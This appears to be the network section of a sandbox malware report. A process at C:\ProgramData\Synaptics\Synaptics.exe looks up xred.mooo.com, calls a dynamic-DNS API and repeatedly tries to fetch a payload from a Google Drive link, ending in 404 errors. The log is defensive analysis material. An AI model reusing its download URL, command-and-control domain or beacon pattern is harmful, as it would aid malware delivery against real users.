Dec 30, 2024 11:25:12.154983997 CET	1.1.1.1	192.168.2.10	0x8606	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:24.560096979 CET	1.1.1.1	192.168.2.10	0xd5d0	No error (0)	docs.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:25.389611959 CET	1.1.1.1	192.168.2.10	0xb63c	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:25.409996986 CET	1.1.1.1	192.168.2.10	0xf77	No error (0)	freedns.afraid.org		69.42.215.252	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:25.736377001 CET	1.1.1.1	192.168.2.10	0x6550	No error (0)	drive.usercontent.google.com		142.250.184.225	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:31.981676102 CET	1.1.1.1	192.168.2.10	0x492	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:36.552695036 CET	1.1.1.1	192.168.2.10	0x1c50	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:25:42.272313118 CET	1.1.1.1	192.168.2.10	0x38a7	Name error (3)	xred.mooo.com	none	none	A (IP address)	IN (0x0001)	false
Dec 30, 2024 11:26:27.017606020 CET	1.1.1.1	192.168.2.10	0x7b84	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 30, 2024 11:26:27.017606020 CET	1.1.1.1	192.168.2.10	0x7b84	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

docs.google.com

drive.usercontent.google.com

freedns.afraid.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49792	69.42.215.252	80	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
Dec 30, 2024 11:25:25.416285038 CET	154	OUT	GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 User-Agent: MyApp Host: freedns.afraid.org Cache-Control: no-cache
Dec 30, 2024 11:25:26.018228054 CET	243	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 30 Dec 2024 10:25:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Cache: MISS Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fERROR: Could not authenticate.0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49784	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:25 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:25 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:25 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-dltfRQuVvephvIiRjkswQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49783	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:25 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:25 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:25 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-I5AzGR62N82ksGQ5nCSS6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.10	49796	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:26 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:26 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:26 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-X4S7eWMeoMWCGMwxmvJRcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.10	49797	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:26 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:27 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:27 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-mvXbzDa46LPV5AqYu3FanA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49799	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:26 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:25:27 UTC	1602	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5DwvLyofigdmCBzkwhSKQ7Bt7HoGkDIELYz4cwLBaoCkD_4L9qrY51vJK_sIy9iv4BFyXgIV8 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:27 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-AOTni1WutmLSA-Zo2u--Gg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=p1ZG0eSUIZ2HeldZ96Efoo_bnHVsW-zXLAmFrVf8kmErECsxut1mh6CAz82zN5lXaMcdsexoy-1GSwmLPClPcQ79SenHcOUEty0lo5FQFasSgcavV29Cn8ptBMVVSQaYL3JdTX05T1-9Ea6IyZ_fRzKvi0oCMhe2YDbGRegqag2JIqD_QWiWyJvD; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:27 UTC	1602	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 67 46 54 6b 39 4f 4e 74 42 69 37 77 52 6f 32 61 79 39 41 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pgFTk9ONtBi7wRo2ay9A2w">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:25:27 UTC	50	IN	Data Raw: 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: is server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.10	49798	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:26 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:25:27 UTC	1594	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC4djF8tObTiUHQz3h8ihG1kgY0137OBSRVc6xv1mW0f_p0acGcGSu7g3nZ-Gso1UXs4 Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:27 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Security-Policy: script-src 'report-sample' 'nonce-oBGSKelAplgDJZbnIgTpCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=Rdx1qHcc9WzTHqwFVXWTlo5OQ79k_7b3an6AdO-4-RZ1KQkTmFYPec_zDcrqE2FxHRSM-YpFjXGFlkzrJYQaygQq2mr_K797_l6CIscjMUSJ9NMD18x4yMosRHm7L3NuTWd-R8PzL5_XDm1JiKyXlnB2Aw1G_nylnOgKmEyyzgh-GWpw_vZr53E; expires=Tue, 01-Jul-2025 10:25:27 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:27 UTC	1594	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 4a 65 4e 78 78 43 76 69 33 41 56 55 67 52 63 46 5f 5f 45 4a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zJeNxxCvi3AVUgRcF__EJQ">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:25:27 UTC	58	IN	Data Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.10	49808	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:27 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:28 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:27 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-Kz-f-oax2C3U9wD9GoCpBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49809	216.58.206.46	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:27 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:25:28 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:28 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: script-src 'report-sample' 'nonce-_ib13G-9If_vkjflnE9bDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49810	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:28 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:25:28 UTC	1595	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC6CtdWtX3Flsy_-TGUlNY6vOAaIcAeEbjT9TlCiVFh8HgNSWRPC37V0eyV8ft3_Gr4X Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:28 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-aWt6KsbIhFsQ2YSrLU_WQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=GiwW7nFNCeCO8Vg7wwsk6suN9RcZZ4j9ZLJR1B3wAEH_GuydJZJ-sUMPZVW2sIgNgfxCBNcZZSXk4njGZn72h6vINgii_8bw5RMoevPRczQyPhXfhuvp4sy08_feQ3U2bfHNMhWC3QWZ20sj7H_3Nhd0PaSAIkRd_FO7N8YvVF9V1NJq24kCijsN; expires=Tue, 01-Jul-2025 10:25:28 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:25:28 UTC	1595	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 79 43 44 50 64 6a 5f 72 32 2d 71 33 72 35 4d 6d 57 35 50 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1yCDPdj_r2-q3r5MmW5PlQ">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 10:25:28 UTC	57	IN	Data Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: d on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49812	142.250.184.225	443	7936	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:25:28 UTC	186	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-12-30 10:25:28 UTC	1602	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC74p8eH7ovukR48Hg0K2orSTZ1RKeXWPPHyV-_uqjBi3b-Wueoq-yoo0TK5n04buEkC_i1JBRQ Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:25:28 GMT P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-SJY8LPdL263el29XRT5qpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Set-Cookie: NID=520=giWRGKWY-fISdODHZz7udS2avMX-23VocVWAKZmesQ-SVvai50uaR9IBc173bp_c_K0VNH2MjbWvibMjWnHspp_TrwSz_nK5TSpP4DpuQbA_LtitgNWO3Oz6oZs1_v56QFegf73mpAja90a4d66n4GPGtOhRZAHfy6hx0OjuQf7xi8yuMhzKymFR; expires=Tue, 01-Jul-2025 10:25:28 GMT; path=/; domain=.google.com; HttpOnly Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
